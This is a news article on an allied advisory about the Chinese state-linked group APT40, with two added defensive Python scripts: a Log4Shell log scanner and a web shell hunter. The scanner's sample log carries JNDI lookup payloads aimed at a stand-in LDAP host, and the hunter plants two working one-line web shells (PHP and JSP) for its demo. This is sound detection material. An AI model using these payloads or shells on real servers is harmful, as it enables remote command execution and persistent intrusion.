9 July 2024

Australia and partners accuse Chinese hackers of large-scale cyberespionage

Australia and its allies have released a joint security advisory highlighting malicious cyber operations conducted by a state-sponsored China-linked threat actor.

Tracked as APT40, Kryptonite Panda, GINGHAM TYPHOON, Leviathan and Bronze Mohawk, the threat actor is believed to be working on behalf of China's Ministry of State Security, the country’s foreign intelligence agency.

“APT40 has repeatedly targeted Australian networks as well as government and private sector networks in the region, and the threat they pose to our networks is ongoing,” said the advisory, co-authored by cyber security agencies from the United States, Britain, Canada, New Zealand, Japan, South Korea and Germany.

The threat actor is able to swiftly adapt proof-of-concept exploits (PoCs) of new vulnerabilities and immediately use them against target networks.

“APT40 regularly conducts reconnaissance against networks of interest, including networks in the authoring agencies’ countries, looking for opportunities to compromise its targets. This regular reconnaissance postures the group to identify vulnerable, end-of-life or no longer maintained devices on networks of interest, and to rapidly deploy exploits. APT40 continues to find success exploiting vulnerabilities from as early as 2017,” the report said.

The list of exploited vulnerabilities includes public flaws in popular software such as Log4j (CVE-2021-44228), Atlassian Confluence (CVE-2021-26084) and Microsoft Exchange (CVE-2021-31207, CVE-2021-34523 and CVE-2021-34473).
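Because the listed flaws are years old and still being exploited, the practical defensive work is mostly log review and patch verification rather than novel research. The following script is an added example, not part of the advisory or any vendor tooling: it scans web access log lines for the JNDI lookup string that characterises CVE-2021-44228 exploitation attempts, normalising percent-encoding first so that encoded requests are not missed. The log lines, IP addresses and the file name are constructed for the demo.

```python
"""Flag CVE-2021-44228 (Log4Shell) exploitation attempts in web access logs.

Added example for illustration; the log lines below are constructed and the
IP addresses come from documentation ranges (198.51.100.0/24, 203.0.113.0/24).
"""
import re
from urllib.parse import unquote

# A Log4j JNDI lookup begins with "${jndi:". Whitespace is tolerated because
# some reverse proxies normalise it before logging.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 5) -> str:
    """Repeatedly URL-decode until the text stops changing.

    Requests are often logged percent-encoded, and scanners sometimes
    double-encode, so a single decode pass is not enough. The round limit
    guards against pathological input.
    """
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def is_log4shell_attempt(line: str) -> bool:
    """Return True when the (decoded) line carries a JNDI lookup string."""
    return bool(JNDI_RE.search(normalize(line)))


def scan(lines):
    """Return (line_number, line) pairs for every line that looks like an attempt."""
    return [(i, line) for i, line in enumerate(lines, 1) if is_log4shell_attempt(line)]


# Constructed sample access log: one benign request, a plain payload in the
# User-Agent, a percent-encoded payload in the query string, and a benign URL
# that merely contains the word "jndi".
SAMPLE_LOG = [
    '198.51.100.7 - - [09/Jul/2024:10:00:01 +1000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [09/Jul/2024:10:00:02 +1000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '198.51.100.9 - - [09/Jul/2024:10:00:03 +1000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.10%2Fx%7D HTTP/1.1" 400 0 "-" "curl/8.0"',
    '198.51.100.10 - - [09/Jul/2024:10:00:04 +1000] "GET /docs/jndi-tutorial.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, line in scan(SAMPLE_LOG):
        print(f"line {number}: possible Log4Shell attempt: {line}")
```

The check deliberately keys on the lookup syntax rather than on the word "jndi" alone, so a documentation URL mentioning JNDI is not flagged. A hit is an attempt, not proof of compromise; confirming exploitation means checking whether the affected Log4j version was actually in the request path and whether the host made the outbound LDAP or RMI connection the payload asks for.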

Previously, APT40 used compromised Australian websites as command and control (C2) servers for its operations, but now the group is utilizing hacked devices, including small-office/home-office (SOHO) devices, as operational infrastructure and last-hop redirectors. Many of these SOHO devices are end-of-life or unpatched and offer a soft target for N-day exploitation.

“APT40 does occasionally use procured or leased infrastructure as victim-facing C2 infrastructure in its operations, however, this tradecraft appears to be in relative decline,” the report noted.

The group’s primary attack methods include phishing campaigns and the use of valid credentials to enable a range of follow-on activities. Once it has compromised a network, the threat actor attempts to establish persistence via a web shell to maintain access to the victim’s environment.
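Web shells are small server-side scripts, so hunting for them on exposed servers is a cheap complement to the patching described above. The script below is an added example and not part of the advisory: it walks a web root, scores every server-side script on whether it sits in a directory that should only hold static uploads and whether its source feeds HTTP request input into code or command execution, and reports anything over a threshold. The directory names, patterns, threshold and the planted demo files are all assumptions made for the illustration and should be tuned to the environment being checked.

```python
"""Score server-side scripts under a web root for web shell characteristics.

Added example for illustration. The upload directory names, pattern weights
and threshold are assumptions; the demo web root is built in a temp directory
with constructed files.
"""
import re
import tempfile
from pathlib import Path

SCRIPT_EXT = {".php", ".phtml", ".jsp", ".jspx", ".aspx", ".ashx", ".asmx"}
# Assumption: these directories should only ever contain static files.
UPLOAD_DIRS = {"uploads", "upload", "images", "media", "tmp"}

# (pattern, weight): request input reaching an execution sink is the core signal.
SUSPICIOUS = [
    (re.compile(r"\beval\s*\(", re.I), 3),
    (re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b", re.I), 2),
    (re.compile(r"\b(system|passthru|shell_exec|popen|proc_open)\s*\(", re.I), 3),
    (re.compile(r"base64_decode\s*\(", re.I), 1),
    (re.compile(r"Runtime\.getRuntime\(\)\.exec\s*\(", re.I), 4),
    (re.compile(r"request\.getParameter\s*\(", re.I), 1),
    (re.compile(r"ProcessStartInfo|Process\.Start\s*\(", re.I), 4),
    (re.compile(r"Request\s*(\.Form|\.QueryString|\[)", re.I), 1),
]
THRESHOLD = 4  # assumption: raise to reduce noise on frameworks that use eval legitimately


def score_file(path: Path, web_root: Path):
    """Return (score, reasons) for one script file relative to the web root."""
    score, reasons = 0, []
    rel = path.relative_to(web_root)
    # A script inside an upload/static directory is suspicious regardless of content.
    if any(part.lower() in UPLOAD_DIRS for part in rel.parts[:-1]):
        score += 3
        reasons.append("script in upload/static directory")
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return 0, ["unreadable"]
    for rx, weight in SUSPICIOUS:
        if rx.search(text):
            score += weight
            reasons.append(f"matches {rx.pattern}")
    return score, reasons


def hunt(web_root):
    """Return findings (highest score first) for scripts at or above THRESHOLD."""
    web_root = Path(web_root)
    findings = []
    for p in web_root.rglob("*"):
        if p.is_file() and p.suffix.lower() in SCRIPT_EXT:
            score, reasons = score_file(p, web_root)
            if score >= THRESHOLD:
                findings.append({"path": str(p.relative_to(web_root)),
                                 "score": score, "reasons": reasons})
    return sorted(findings, key=lambda f: -f["score"])


def build_demo_root() -> str:
    """Construct a throwaway web root: one benign page, one image, two planted shells."""
    root = Path(tempfile.mkdtemp(prefix="webroot_"))
    (root / "index.php").write_text("<?php echo 'hello'; ?>\n")
    (root / "uploads").mkdir()
    (root / "uploads" / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0 not really a jpeg")
    # Constructed sample: a minimal PHP shell dropped into the upload directory.
    (root / "uploads" / "avatar.php").write_text("<?php @eval($_POST['c']); ?>\n")
    (root / "app").mkdir()
    # Constructed sample: a JSP that runs a request parameter as a command.
    (root / "app" / "help.jsp").write_text(
        '<% Runtime.getRuntime().exec(request.getParameter("q")); %>\n')
    return str(root)


if __name__ == "__main__":
    for f in hunt(build_demo_root()):
        print(f["score"], f["path"], "; ".join(f["reasons"]))
```

Scoring rather than exact matching is the point: a single `eval` in a templating library is normal, but `eval` plus request input in a directory that only the upload handler should write to is worth a ticket. Pair the scan with file modification times and, where available, the web server's own logs of POST requests to newly created scripts, since a web shell that was never requested is far less urgent than one that has been.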

More technical details on APT40’s TTPs can be found here.
